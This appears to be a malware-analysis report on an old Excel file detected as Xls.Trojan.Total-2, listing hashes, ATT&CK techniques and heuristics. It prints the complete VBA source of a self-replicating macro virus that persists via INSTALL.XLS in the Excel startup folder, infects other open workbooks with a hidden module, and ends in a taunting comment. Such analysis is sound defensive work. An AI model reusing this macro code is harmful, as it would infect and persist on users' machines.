Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f7b3c34c70e23cd0…

MALICIOUS

Office (OLE)

21.0 KB Created: 1998-09-19 21:39:32 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: c4f3a3112f5bd28b3eb332abde2b026a SHA-1: 6edfa1d9397d508d652db0f251bf39a6c58aa81c SHA-256: f7b3c34c70e23cd0aa297fd32e5ba4beb73f1cdbfb81c1f212beb34a9aceb550
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is an Excel file containing VBA macros, including Auto_Open and Auto_Close functions, which are commonly used for malicious purposes. The script attempts to copy its VBA module to other workbooks and save itself as 'INSTALL.XLS' in the Excel startup path, indicating a persistence mechanism. The presence of Auto_Open and Auto_Close macros, along with the file's detection as 'Xls.Trojan.Total-2', strongly suggests malicious intent.

Heuristics 4

  • ClamAV: Xls.Trojan.Total-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Total-2
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2109 bytes
SHA-256: ff0527cfeb0c234ae8873b33a3a1020113f43265f483900c57134bcfe27dd943
Detection
ClamAV: Xls.Trojan.Total-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "sum_total"

Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnSheetActivate = ThisWorkbook.Name & "!sum_total.total"
End Sub
Sub auto_close()
Attribute auto_close.VB_ProcData.VB_Invoke_Func = " \n14"
'On Error Resume Next
PC_INITIAL_BOOK = Application.ThisWorkbook.Name
If Dir("C:\PASS.NHS") = "PASS.NHS" Then Exit Sub
pc_excel_startup_path = Application.StartupPath + "\INSTALL.XLS"
If Dir(pc_excel_startup_path) = "INSTALL.XLS" Then Exit Sub
'dstart:
'MsgBox "STARTING UP!"
ThisWorkbook.Modules("sum_total").Copy
new_book = ActiveWorkbook.Name
WindowState = xlMaximized
Application.Windows(new_book).Visible = False
'Application.Workbooks(new_book).SaveAs filename:=PC_EXCEL_STARTUP_PATH
Application.Workbooks(new_book).SaveAs filename:=pc_excel_startup_path
'MsgBox "All done saved as " & pc_excel_startup_path
'thisWorkbook.SaveAs filename:=PC_EXCEL_STARTUP_PATH
'ThisWorkbook.SaveAs filename:=PC_INITIAL_BOOK
End Sub
Sub total()
Attribute total.VB_ProcData.VB_Invoke_Func = " \n14"
PC_BOOK_COUNT = Application.Workbooks.Count
If PC_BOOK_COUNT = 1 Then Exit Sub
For pc_first_loop = 1 To PC_BOOK_COUNT
pc_copy_trigger = 0
PC_TARGET = Workbooks(pc_first_loop).Name
If PC_TARGET = ThisWorkbook.Name Then GoTo redundancy_check
pc_module_count = Workbooks(PC_TARGET).Modules.Count
If pc_module_count > 0 Then
For PC_SECOND_LOOP = 1 To pc_module_count
If Workbooks(PC_TARGET).Modules(PC_SECOND_LOOP).Name = "sum_total" Then pc_copy_trigger = 1
Next PC_SECOND_LOOP
End If
If pc_copy_trigger = 0 Then
Windows(PC_TARGET).Activate
ThisWorkbook.Modules("sum_total").Copy before:=Workbooks(PC_TARGET).Sheets(1)
Workbooks(PC_TARGET).Modules("sum_total").Visible = False
End If
redundancy_check:
Next pc_first_loop
skip:
Exit Sub
' ***********************************
' * IF YOU READ THIS THEN YOU WILL  *
' * REALISE THAT YOU HAVE THE MOST  *
' * RUBBISH ANTI-VIRUS SOFTWARE     *
' * BEWARE BECAUSE RELEASE II WILL  *
' * SCRAMBLE YOUR FAT - XOH         *
' ***********************************
End Sub